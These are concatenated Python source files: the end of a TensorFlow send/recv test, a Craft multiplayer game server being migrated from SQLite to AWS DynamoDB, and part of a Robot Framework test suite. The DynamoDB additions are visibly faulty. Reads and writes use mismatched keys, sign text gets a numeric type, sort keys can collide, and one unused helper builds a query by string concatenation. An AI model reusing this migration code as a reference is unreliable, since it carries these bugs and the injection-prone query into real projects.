'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
def testLocalCrossDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
if __name__ == '__main__':
test.main()
|
server-ddb.py
|
from math import floor
from world import World
import Queue
import SocketServer
import datetime
import random
import re
import requests
import sqlite3
import sys
import threading
import time
import traceback
import boto3
from botocore.exceptions import ClientError
dynamodb_client = boto3.client("dynamodb", region_name="us-west-2")
def create_ddb_get_block_type(p,q,x,y,z):
#select w from block where p = :p and q = :q and x = :x and y = :y and z = :z;'
return {
"TableName": "GameState",
"KeyConditionExpression": "#11b31 = :11b31 And begins_with(#11b32, :11b32)",
"ProjectionExpression": "#11b30",
"ExpressionAttributeNames": {"#11b30":"type","#11b31":"PK","#11b32":"SK"},
"ExpressionAttributeValues": {":11b31": {"S":"block"},":11b32": {"S":p+q+x+y+z}}
}
def create_ddb_get_block_rowid(p,q,key):
#select rowid, x, y, z, w from block where p = :p and q = :q and rowid > :key;
return {
"Statement": "select rowid,x,y,z,w from GameState where PK='Block' and SK="+p+q+key
}
def create_ddb_get_light(p,q):
#select x, y, z, w from light where p = :p and q = :q;
return {
"TableName": "GameState",
"KeyConditionExpression": "#4f421 = :4f421 And begins_with(#4f422, :4f422)",
"ProjectionExpression": "#4f420",
"ExpressionAttributeNames": {"#4f420":"light","#4f421":"PK","#4f422":"SK"},
"ExpressionAttributeValues": {":4f421": {"S":"light"},":4f422": {"S":p+q}}
}
def create_ddb_get_sign(p,q):
#select x, y, z, face, text from sign where p = :p and q = :q;
return {
"TableName": "GameState",
"KeyConditionExpression": "#1ec11 = :1ec11 And begins_with(#1ec12, :1ec12)",
"ProjectionExpression": "#1ec10",
"ExpressionAttributeNames": {"#1ec10":"sign","#1ec11":"PK","#1ec12":"SK"},
"ExpressionAttributeValues": {":1ec11": {"S":"sign"},":1ec12": {"S":p+q}}
}
def create_ddb_put_item(_type, p, q, x, y, z, w):
    # Parameter order matches the call sites in on_block/on_light: (type, p, q, x, y, z, w).
return {
"TableName": "GameState",
"Item": {
"PK": {"S":_type},
"SK": {"S":p+q+x+y+z+w},
"position": {"S":x+y+z},
"type": {"S":w},
"chunk": {"S":p+q},
"block": {"M": {"p": {"N":p},"q": {"N":q},"w": {"N":w},"x": {"N":x},"y": {"N":y},"z": {"N":z}}}
}
}
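# Editor's note (illustrative): create_ddb_put_item builds a single-table item
# whose PK is the entity type (e.g. 'Block') and whose SK is the string
# concatenation p+q+x+y+z+w with no delimiter; for example p='0', q='0', x='1',
# y='2', z='3', w='5' gives SK='001235'. The begins_with() key conditions in the
# query builders above rely on this prefix layout.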
def execute_query(dynamodb_client, input):
try:
response = dynamodb_client.query(**input)
log("Query successful.",response)
# Handle response
return response
    except ClientError as error:
        log("ClientError while querying: " + error.response['Error']['Message'])
    except BaseException as error:
        log("Unknown error while querying: " + str(error))
def create_ddb_sign_put_item(_type,p,q,x,y,z,face,text):
return {
"TableName": "GameState",
"Item": {
"PK": {"S":_type},
"SK": {"S":p+q+x+y+z+face+text},
"chunk": {"S":p+q},
"sign_position": {"S":x+y+z},
"sign_face": {"S":x+y+z+face},
"sign": {"M": {"face": {"N":face},"p": {"N":p},"q": {"N":q},"text": {"N":text},"x": {"N":x},"y": {"N":y},"z": {"N":z}}}
}
}
def execute_ddb_put_item(dynamodb_client, input):
try:
log("INFO execute_ddb_put_item {}".format(input))
response = dynamodb_client.put_item(**input)
log("INFO execute_ddb_put_item Successfully put item.")
except Exception as error:
log("ERROR execute_ddb_put_item {}".format(error))
def execute_ddb_get_item(dynamodb_client, input):
try:
log("INFO execute_ddb_get_item {}".format(input))
response = dynamodb_client.execute_statement(**input)
log("INFO execute_ddb_get_item Successfully get item. response=".format(response))
return response
except Exception as error:
log("ERROR execute_ddb_get_item {}".format(error))
def execute_ddb_query(dynamodb_client, input):
try:
log("INFO execute_ddb_query {}".format(input))
response = dynamodb_client.query(**input)
log("INFO execute_ddb_query Query Successful. response=".format(response))
return response
except Exception as error:
log("ERROR execute_ddb_query {}".format(error))
DEFAULT_HOST = '0.0.0.0'
DEFAULT_PORT = 4080
DB_PATH = 'craft.db'
LOG_PATH = 'log.txt'
CHUNK_SIZE = 32
BUFFER_SIZE = 4096
COMMIT_INTERVAL = 5
AUTH_REQUIRED = False
AUTH_URL = 'https://craft.michaelfogleman.com/api/1/access'
DAY_LENGTH = 600
SPAWN_POINT = (0, 0, 0, 0, 0)
RATE_LIMIT = False
RECORD_HISTORY = False
INDESTRUCTIBLE_ITEMS = set([16])
ALLOWED_ITEMS = set([
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
17, 18, 19, 20, 21, 22, 23,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63])
AUTHENTICATE = 'A'
BLOCK = 'B'
CHUNK = 'C'
DISCONNECT = 'D'
KEY = 'K'
LIGHT = 'L'
NICK = 'N'
POSITION = 'P'
REDRAW = 'R'
SIGN = 'S'
TALK = 'T'
TIME = 'E'
VERSION = 'V'
YOU = 'U'
try:
from config import *
except ImportError:
pass
def log(*args):
now = datetime.datetime.utcnow()
line = ' '.join(map(str, (now,) + args))
print line
with open(LOG_PATH, 'a') as fp:
fp.write('%s\n' % line)
def chunked(x):
return int(floor(round(x) / CHUNK_SIZE))
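# Example: with CHUNK_SIZE = 32, chunked(31.4) == 0 and chunked(32) == 1, so a
# block at world coordinates (x, z) lives in chunk (p, q) = (chunked(x), chunked(z)).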
def packet(*args):
return '%s\n' % ','.join(map(str, args))
class RateLimiter(object):
def __init__(self, rate, per):
self.rate = float(rate)
self.per = float(per)
self.allowance = self.rate
self.last_check = time.time()
def tick(self):
if not RATE_LIMIT:
return False
now = time.time()
elapsed = now - self.last_check
self.last_check = now
self.allowance += elapsed * (self.rate / self.per)
if self.allowance > self.rate:
self.allowance = self.rate
if self.allowance < 1:
return True # too fast
else:
self.allowance -= 1
return False # okay
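# Editor's note: RateLimiter above implements a simple token bucket (`rate`
# tokens refilled over `per` seconds). A hypothetical usage sketch, never called
# anywhere, and only meaningful when RATE_LIMIT is True:
def _rate_limiter_example():
    limiter = RateLimiter(100, 5)  # roughly 100 packets allowed per 5 seconds
    for _ in range(200):
        if limiter.tick():  # True means the caller is sending too fast
            return True     # the real Handler logs 'RATE' and disconnects here
    return False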
class Server(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
daemon_threads = True
class Handler(SocketServer.BaseRequestHandler):
def setup(self):
self.position_limiter = RateLimiter(100, 5)
self.limiter = RateLimiter(1000, 10)
self.version = None
self.client_id = None
self.user_id = None
self.nick = None
self.queue = Queue.Queue()
self.running = True
self.start()
def handle(self):
model = self.server.model
model.enqueue(model.on_connect, self)
try:
buf = []
while True:
data = self.request.recv(BUFFER_SIZE)
if not data:
break
buf.extend(data.replace('\r\n', '\n'))
while '\n' in buf:
index = buf.index('\n')
line = ''.join(buf[:index])
buf = buf[index + 1:]
if not line:
continue
if line[0] == POSITION:
if self.position_limiter.tick():
log('RATE', self.client_id)
self.stop()
return
else:
if self.limiter.tick():
log('RATE', self.client_id)
self.stop()
return
model.enqueue(model.on_data, self, line)
finally:
model.enqueue(model.on_disconnect, self)
def finish(self):
self.running = False
def stop(self):
self.request.close()
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
def run(self):
while self.running:
try:
buf = []
try:
buf.append(self.queue.get(timeout=5))
try:
while True:
buf.append(self.queue.get(False))
except Queue.Empty:
pass
except Queue.Empty:
continue
data = ''.join(buf)
self.request.sendall(data)
except Exception:
self.request.close()
#raise
def send_raw(self, data):
if data:
self.queue.put(data)
def send(self, *args):
self.send_raw(packet(*args))
class Model(object):
def __init__(self, seed):
self.world = World(seed)
self.clients = []
self.queue = Queue.Queue()
self.commands = {
AUTHENTICATE: self.on_authenticate,
CHUNK: self.on_chunk,
BLOCK: self.on_block,
LIGHT: self.on_light,
POSITION: self.on_position,
TALK: self.on_talk,
SIGN: self.on_sign,
VERSION: self.on_version,
}
self.patterns = [
(re.compile(r'^/nick(?:\s+([^,\s]+))?$'), self.on_nick),
(re.compile(r'^/spawn$'), self.on_spawn),
(re.compile(r'^/goto(?:\s+(\S+))?$'), self.on_goto),
(re.compile(r'^/pq\s+(-?[0-9]+)\s*,?\s*(-?[0-9]+)$'), self.on_pq),
(re.compile(r'^/help(?:\s+(\S+))?$'), self.on_help),
(re.compile(r'^/list$'), self.on_list),
]
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
def run(self):
self.connection = sqlite3.connect(DB_PATH)
self.create_tables()
self.commit()
while True:
try:
if time.time() - self.last_commit > COMMIT_INTERVAL:
self.commit()
self.dequeue()
except Exception:
traceback.print_exc()
def enqueue(self, func, *args, **kwargs):
self.queue.put((func, args, kwargs))
def dequeue(self):
try:
func, args, kwargs = self.queue.get(timeout=5)
func(*args, **kwargs)
except Queue.Empty:
pass
def execute(self, *args, **kwargs):
return self.connection.execute(*args, **kwargs)
def commit(self):
self.last_commit = time.time()
self.connection.commit()
def create_tables(self):
queries = [
'create table if not exists block ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists block_pqxyz_idx on '
' block (p, q, x, y, z);',
'create table if not exists light ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists light_pqxyz_idx on '
' light (p, q, x, y, z);',
'create table if not exists sign ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' face int not null,'
' text text not null'
');',
'create index if not exists sign_pq_idx on sign (p, q);',
'create unique index if not exists sign_xyzface_idx on '
' sign (x, y, z, face);',
'create table if not exists block_history ('
' timestamp real not null,'
' user_id int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
]
for query in queries:
self.execute(query)
def get_default_block(self, x, y, z):
p, q = chunked(x), chunked(z)
chunk = self.world.get_chunk(p, q)
return chunk.get((x, y, z), 0)
def get_block(self, x, y, z):
log('get_block')
query = (
'select w from block where '
'p = :p and q = :q and x = :x and y = :y and z = :z;'
)
p, q = chunked(x), chunked(z)
#ddb
#rows = execute_ddb_get_item(dynamodb_client,create_ddb_get_block_type(str(p),str(q),str(x),str(y),str(z)))
rows_ddb = execute_query(dynamodb_client,create_ddb_get_block_type(str(p),str(q),str(x),str(y),str(z)))
log('get block type',dict(p=p, q=q, x=x, y=y, z=z))
        if rows_ddb is not None:
            log('rows from ddb', rows_ddb.get('Items'))
rows = list(self.execute(query, dict(p=p, q=q, x=x, y=y, z=z)))
if rows:
log('rows from sqlite',rows[0][0])
return rows[0][0]
return self.get_default_block(x, y, z)
def next_client_id(self):
result = 1
client_ids = set(x.client_id for x in self.clients)
while result in client_ids:
result += 1
return result
def on_connect(self, client):
client.client_id = self.next_client_id()
client.nick = 'guest%d' % client.client_id
#log('CONN', client.client_id, *client.client_address)
client.position = SPAWN_POINT
self.clients.append(client)
client.send(YOU, client.client_id, *client.position)
client.send(TIME, time.time(), DAY_LENGTH)
client.send(TALK, 'Welcome to Craft!')
client.send(TALK, 'Type "/help" for a list of commands.')
self.send_position(client)
self.send_positions(client)
self.send_nick(client)
self.send_nicks(client)
def on_data(self, client, data):
#log('RECV', client.client_id, data)
args = data.split(',')
command, args = args[0], args[1:]
if command in self.commands:
func = self.commands[command]
func(client, *args)
def on_disconnect(self, client):
#log('DISC', client.client_id, *client.client_address)
self.clients.remove(client)
self.send_disconnect(client)
#self.send_talk('%s has disconnected from the server.' % client.nick)
def on_version(self, client, version):
if client.version is not None:
return
version = int(version)
if version != 1:
client.stop()
return
client.version = version
# TODO: client.start() here
def on_authenticate(self, client, username, access_token):
user_id = None
if username and access_token:
payload = {
'username': username,
'access_token': access_token,
}
response = requests.post(AUTH_URL, data=payload)
if response.status_code == 200 and response.text.isdigit():
user_id = int(response.text)
client.user_id = user_id
if user_id is None:
client.nick = 'guest%d' % client.client_id
client.send(TALK, 'Visit craft.michaelfogleman.com to register!')
else:
client.nick = username
self.send_nick(client)
# TODO: has left message if was already authenticated
self.send_talk('%s has joined the game.' % client.nick)
def on_chunk(self, client, p, q, key=0):
packets = []
p, q, key = map(int, (p, q, key))
query = (
'select rowid, x, y, z, w from block where '
'p = :p and q = :q and rowid > :key;'
)
#ddb
        #rows = execute_ddb_get_item(dynamodb_client,create_ddb_get_block_rowid(str(p),str(q),str(key)))
#rows = execute_query(dynamodb_client,create_ddb_get_item(str(p),str(q),str(key)))
rows = self.execute(query, dict(p=p, q=q, key=key))
max_rowid = 0
blocks = 0
for rowid, x, y, z, w in rows:
blocks += 1
packets.append(packet(BLOCK, p, q, x, y, z, w))
max_rowid = max(max_rowid, rowid)
query = (
'select x, y, z, w from light where '
'p = :p and q = :q;'
)
#ddb
#rows = execute_ddb_get_item(dynamodb_client,create_ddb_get_light(str(p),str(q)))
rows = self.execute(query, dict(p=p, q=q))
lights = 0
for x, y, z, w in rows:
lights += 1
packets.append(packet(LIGHT, p, q, x, y, z, w))
query = (
'select x, y, z, face, text from sign where '
'p = :p and q = :q;'
)
#ddb
#rows = execute_ddb_get_item(dynamodb_client,create_ddb_get_sign(str(p),str(q)))
rows = self.execute(query, dict(p=p, q=q))
signs = 0
for x, y, z, face, text in rows:
signs += 1
packets.append(packet(SIGN, p, q, x, y, z, face, text))
if blocks:
packets.append(packet(KEY, p, q, max_rowid))
if blocks or lights or signs:
packets.append(packet(REDRAW, p, q))
packets.append(packet(CHUNK, p, q))
client.send_raw(''.join(packets))
def on_block(self, client, x, y, z, w):
        log('on_block', 'x='+str(x)+' y='+str(y)+' z='+str(z)+' w='+str(w))
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
previous = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif y <= 0 or y > 255:
message = 'Invalid block coordinates.'
elif w not in ALLOWED_ITEMS:
message = 'That item is not allowed.'
elif w and previous:
message = 'Cannot create blocks in a non-empty space.'
elif not w and not previous:
message = 'That space is already empty.'
elif previous in INDESTRUCTIBLE_ITEMS:
message = 'Cannot destroy that type of block.'
if message is not None:
client.send(BLOCK, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert into block_history (timestamp, user_id, x, y, z, w) '
'values (:timestamp, :user_id, :x, :y, :z, :w);'
)
if RECORD_HISTORY:
self.execute(query, dict(timestamp=time.time(),
user_id=client.user_id, x=x, y=y, z=z, w=w))
query = (
'insert or replace into block (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
log('insert into sqlite',str(p)+' '+str(q)+' '+str(x)+' '+str(y)+' '+str(z)+' '+str(w))
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_block(client, p, q, x, y, z, w)
#ddb
log('insert into ddb',str(p)+' '+str(q)+' '+str(x)+' '+str(y)+' '+str(z)+' '+str(w))
execute_ddb_put_item(dynamodb_client, create_ddb_put_item('Block',str(p), str(q), str(x), str(y), str(z), str(w)))
for dx in range(-1, 2):
for dz in range(-1, 2):
if dx == 0 and dz == 0:
continue
if dx and chunked(x + dx) == p:
continue
if dz and chunked(z + dz) == q:
continue
np, nq = p + dx, q + dz
self.execute(query, dict(p=np, q=nq, x=x, y=y, z=z, w=-w))
self.send_block(client, np, nq, x, y, z, -w)
if w == 0:
query = (
'delete from sign where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
query = (
'update light set w = 0 where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
def on_light(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
block = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif block == 0:
message = 'Lights must be placed on a block.'
elif w < 0 or w > 15:
message = 'Invalid light value.'
if message is not None:
# TODO: client.send(LIGHT, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert or replace into light (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_light(client, p, q, x, y, z, w)
#ddb
execute_ddb_put_item(dynamodb_client, create_ddb_put_item('Light',str(p), str(q), str(x), str(y), str(z), str(w)))
def on_sign(self, client, x, y, z, face, *args):
if AUTH_REQUIRED and client.user_id is None:
client.send(TALK, 'Only logged in users are allowed to build.')
return
text = ','.join(args)
x, y, z, face = map(int, (x, y, z, face))
if y <= 0 or y > 255:
return
if face < 0 or face > 7:
return
if len(text) > 48:
return
p, q = chunked(x), chunked(z)
if text:
query = (
'insert or replace into sign (p, q, x, y, z, face, text) '
'values (:p, :q, :x, :y, :z, :face, :text);'
)
self.execute(query,
dict(p=p, q=q, x=x, y=y, z=z, face=face, text=text))
else:
query = (
'delete from sign where '
'x = :x and y = :y and z = :z and face = :face;'
)
self.execute(query, dict(x=x, y=y, z=z, face=face))
self.send_sign(client, p, q, x, y, z, face, text)
def on_position(self, client, x, y, z, rx, ry):
x, y, z, rx, ry = map(float, (x, y, z, rx, ry))
client.position = (x, y, z, rx, ry)
self.send_position(client)
def on_talk(self, client, *args):
text = ','.join(args)
if text.startswith('/'):
for pattern, func in self.patterns:
match = pattern.match(text)
if match:
func(client, *match.groups())
break
else:
client.send(TALK, 'Unrecognized command: "%s"' % text)
elif text.startswith('@'):
nick = text[1:].split(' ', 1)[0]
for other in self.clients:
if other.nick == nick:
client.send(TALK, '%s> %s' % (client.nick, text))
other.send(TALK, '%s> %s' % (client.nick, text))
break
else:
client.send(TALK, 'Unrecognized nick: "%s"' % nick)
else:
self.send_talk('%s> %s' % (client.nick, text))
def on_nick(self, client, nick=None):
if AUTH_REQUIRED:
client.send(TALK, 'You cannot change your nick on this server.')
return
if nick is None:
client.send(TALK, 'Your nickname is %s' % client.nick)
else:
self.send_talk('%s is now known as %s' % (client.nick, nick))
client.nick = nick
self.send_nick(client)
def on_spawn(self, client):
client.position = SPAWN_POINT
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_goto(self, client, nick=None):
if nick is None:
clients = [x for x in self.clients if x != client]
other = random.choice(clients) if clients else None
else:
nicks = dict((client.nick, client) for client in self.clients)
other = nicks.get(nick)
if other:
client.position = other.position
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_pq(self, client, p, q):
p, q = map(int, (p, q))
if abs(p) > 1000 or abs(q) > 1000:
return
client.position = (p * CHUNK_SIZE, 0, q * CHUNK_SIZE, 0, 0)
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_help(self, client, topic=None):
if topic is None:
client.send(TALK, 'Type "t" to chat. Type "/" to type commands:')
client.send(TALK, '/goto [NAME], /help [TOPIC], /list, /login NAME, /logout, /nick')
client.send(TALK, '/offline [FILE], /online HOST [PORT], /pq P Q, /spawn, /view N')
return
topic = topic.lower().strip()
if topic == 'goto':
client.send(TALK, 'Help: /goto [NAME]')
client.send(TALK, 'Teleport to another user.')
client.send(TALK, 'If NAME is unspecified, a random user is chosen.')
elif topic == 'list':
client.send(TALK, 'Help: /list')
client.send(TALK, 'Display a list of connected users.')
elif topic == 'login':
client.send(TALK, 'Help: /login NAME')
client.send(TALK, 'Switch to another registered username.')
client.send(TALK, 'The login server will be re-contacted. The username is case-sensitive.')
elif topic == 'logout':
client.send(TALK, 'Help: /logout')
client.send(TALK, 'Unauthenticate and become a guest user.')
client.send(TALK, 'Automatic logins will not occur again until the /login command is re-issued.')
elif topic == 'offline':
client.send(TALK, 'Help: /offline [FILE]')
client.send(TALK, 'Switch to offline mode.')
client.send(TALK, 'FILE specifies the save file to use and defaults to "craft".')
elif topic == 'online':
client.send(TALK, 'Help: /online HOST [PORT]')
client.send(TALK, 'Connect to the specified server.')
elif topic == 'nick':
client.send(TALK, 'Help: /nick [NICK]')
client.send(TALK, 'Get or set your nickname.')
elif topic == 'pq':
client.send(TALK, 'Help: /pq P Q')
client.send(TALK, 'Teleport to the specified chunk.')
elif topic == 'spawn':
client.send(TALK, 'Help: /spawn')
client.send(TALK, 'Teleport back to the spawn point.')
elif topic == 'view':
client.send(TALK, 'Help: /view N')
client.send(TALK, 'Set viewing distance, 1 - 24.')
def on_list(self, client):
client.send(TALK,
'Players: %s' % ', '.join(x.nick for x in self.clients))
def send_positions(self, client):
for other in self.clients:
if other == client:
continue
client.send(POSITION, other.client_id, *other.position)
def send_position(self, client):
for other in self.clients:
if other == client:
continue
other.send(POSITION, client.client_id, *client.position)
def send_nicks(self, client):
for other in self.clients:
if other == client:
continue
client.send(NICK, other.client_id, other.nick)
def send_nick(self, client):
for other in self.clients:
other.send(NICK, client.client_id, client.nick)
def send_disconnect(self, client):
for other in self.clients:
if other == client:
continue
other.send(DISCONNECT, client.client_id)
def send_block(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(BLOCK, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_light(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(LIGHT, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_sign(self, client, p, q, x, y, z, face, text):
for other in self.clients:
if other == client:
continue
other.send(SIGN, p, q, x, y, z, face, text)
def send_talk(self, text):
log(text)
for client in self.clients:
client.send(TALK, text)
def cleanup():
world = World(None)
conn = sqlite3.connect(DB_PATH)
query = 'select x, y, z from block order by rowid desc limit 1;'
last = list(conn.execute(query))[0]
query = 'select distinct p, q from block;'
chunks = list(conn.execute(query))
count = 0
total = 0
delete_query = 'delete from block where x = %d and y = %d and z = %d;'
print 'begin;'
for p, q in chunks:
chunk = world.create_chunk(p, q)
query = 'select x, y, z, w from block where p = :p and q = :q;'
rows = conn.execute(query, {'p': p, 'q': q})
for x, y, z, w in rows:
if chunked(x) != p or chunked(z) != q:
continue
total += 1
if (x, y, z) == last:
continue
original = chunk.get((x, y, z), 0)
if w == original or original in INDESTRUCTIBLE_ITEMS:
count += 1
print delete_query % (x, y, z)
conn.close()
print 'commit;'
print >> sys.stderr, '%d of %d blocks will be cleaned up' % (count, total)
def main():
if len(sys.argv) == 2 and sys.argv[1] == 'cleanup':
cleanup()
return
host, port = DEFAULT_HOST, DEFAULT_PORT
if len(sys.argv) > 1:
host = sys.argv[1]
if len(sys.argv) > 2:
port = int(sys.argv[2])
log('SERV', host, port)
model = Model(None)
model.start()
server = Server((host, port), Handler)
server.model = model
server.serve_forever()
if __name__ == '__main__':
main()
|
test_run_and_rebot.py
|
import unittest
import time
import glob
import sys
import threading
import tempfile
import signal
import logging
from os.path import abspath, curdir, dirname, exists, join
from os import chdir, getenv
from robot import run, run_cli, rebot, rebot_cli
from robot.model import SuiteVisitor
from robot.running import namespace
from robot.utils import JYTHON, StringIO
from robot.utils.asserts import assert_equal, assert_raises, assert_true
from resources.runningtestcase import RunningTestCase
from resources.Listener import Listener
ROOT = dirname(dirname(dirname(abspath(__file__))))
TEMP = getenv('TEMPDIR', tempfile.gettempdir())
OUTPUT_PATH = join(TEMP, 'output.xml')
REPORT_PATH = join(TEMP, 'report.html')
LOG_PATH = join(TEMP, 'log.html')
LOG = 'Log: %s' % LOG_PATH
def run_without_outputs(*args, **kwargs):
options = {'output': 'NONE', 'log': 'NoNe', 'report': None}
options.update(kwargs)
return run(*args, **options)
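# Editor's note (illustrative): run_without_outputs(data, exclude='fail') runs the
# suite with output, log and report all disabled; any keyword argument accepted by
# robot.run() can still be passed through and overrides the defaults above.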
def assert_signal_handler_equal(signum, expected):
sig = signal.getsignal(signum)
try:
assert_equal(sig, expected)
except AssertionError:
if not JYTHON:
raise
        # With Jython, `getsignal` seems to always return a different object, so that
        # even `getsignal(SIGINT) == getsignal(SIGINT)` is false. This doesn't
        # always happen and may depend, e.g., on the underlying JVM. Comparing
# string representations ought to be good enough.
assert_equal(str(sig), str(expected))
class StreamWithOnlyWriteAndFlush(object):
def __init__(self):
self._buffer = []
def write(self, msg):
self._buffer.append(msg)
def flush(self):
pass
def getvalue(self):
return ''.join(self._buffer)
class TestRun(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
warn = join(ROOT, 'atest', 'testdata', 'misc', 'warnings_and_errors.robot')
nonex = join(TEMP, 'non-existing-file-this-is.robot')
remove_files = [LOG_PATH, REPORT_PATH, OUTPUT_PATH]
def test_run_once(self):
assert_equal(run(self.data, outputdir=TEMP, report='none'), 1)
self._assert_outputs([('Pass And Fail', 2), (LOG, 1), ('Report:', 0)])
assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(run_without_outputs(self.data), 1)
assert_equal(run_without_outputs(self.data, name='New Name'), 1)
self._assert_outputs([('Pass And Fail', 2), ('New Name', 2), (LOG, 0)])
def test_run_fail(self):
assert_equal(run(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[('Pass And Fail', 2), (LOG, 1)])
def test_run_error(self):
assert_equal(run(self.nonex), 252)
self._assert_outputs(stderr=[('[ ERROR ]', 1), (self.nonex, 1),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(run_without_outputs(self.data, stdout=stdout), 1)
self._assert_output(stdout, [('Pass And Fail', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_custom_stderr(self):
stderr = StringIO()
assert_equal(run_without_outputs(self.warn, stderr=stderr), 0)
self._assert_output(stderr, [('[ WARN ]', 4), ('[ ERROR ]', 2)])
self._assert_outputs([('Warnings And Errors', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(run_without_outputs(self.warn, stdout=output, stderr=output), 0)
self._assert_output(output, [('[ WARN ]', 4), ('[ ERROR ]', 2),
('Warnings And Errors', 3), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_multi_options_as_single_string(self):
assert_equal(run_without_outputs(self.data, exclude='fail'), 0)
self._assert_outputs([('FAIL', 0)])
def test_listener_gets_notification_about_log_report_and_output(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run(self.data, output=OUTPUT_PATH, report=REPORT_PATH,
log=LOG_PATH, listener=listener), 1)
self._assert_outputs(stdout=[('[output {0}]'.format(OUTPUT_PATH), 1),
('[report {0}]'.format(REPORT_PATH), 1),
('[log {0}]'.format(LOG_PATH), 1),
('[listener close]', 1)])
def test_pass_listener_as_instance(self):
assert_equal(run_without_outputs(self.data, listener=Listener(1)), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_string(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=module_file+":1"), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_list(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=[module_file+":1", Listener(2)]), 1)
self._assert_outputs([("[from listener 1]", 1), ("[from listener 2]", 1)])
def test_pre_run_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def start_suite(self, suite):
suite.tests = [t for t in suite.tests if t.tags.match('pass')]
assert_equal(run_without_outputs(self.data, prerunmodifier=Modifier()), 0)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 0)])
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
modifier = Modifier()
assert_equal(run(self.data, outputdir=TEMP, log=LOG_PATH, prerebotmodifier=modifier), 1)
assert_equal(modifier.tests, ['Pass', 'Fail'])
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)])
def test_invalid_modifier(self):
assert_equal(run_without_outputs(self.data, prerunmodifier=42), 1)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)],
[("[ ERROR ] Executing model modifier 'integer' "
"failed: AttributeError: ", 1)])
def test_run_cli_system_exits_by_default(self):
exit = assert_raises(SystemExit, run_cli, ['-d', TEMP, self.data])
assert_equal(exit.code, 1)
def test_run_cli_optionally_returns_rc(self):
rc = run_cli(['-d', TEMP, self.data], exit=False)
assert_equal(rc, 1)
class TestRebot(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'rebot', 'created_normal.xml')
nonex = join(TEMP, 'non-existing-file-this-is.xml')
remove_files = [LOG_PATH, REPORT_PATH]
def test_run_once(self):
assert_equal(rebot(self.data, outputdir=TEMP, report='NONE'), 1)
self._assert_outputs([(LOG, 1), ('Report:', 0)])
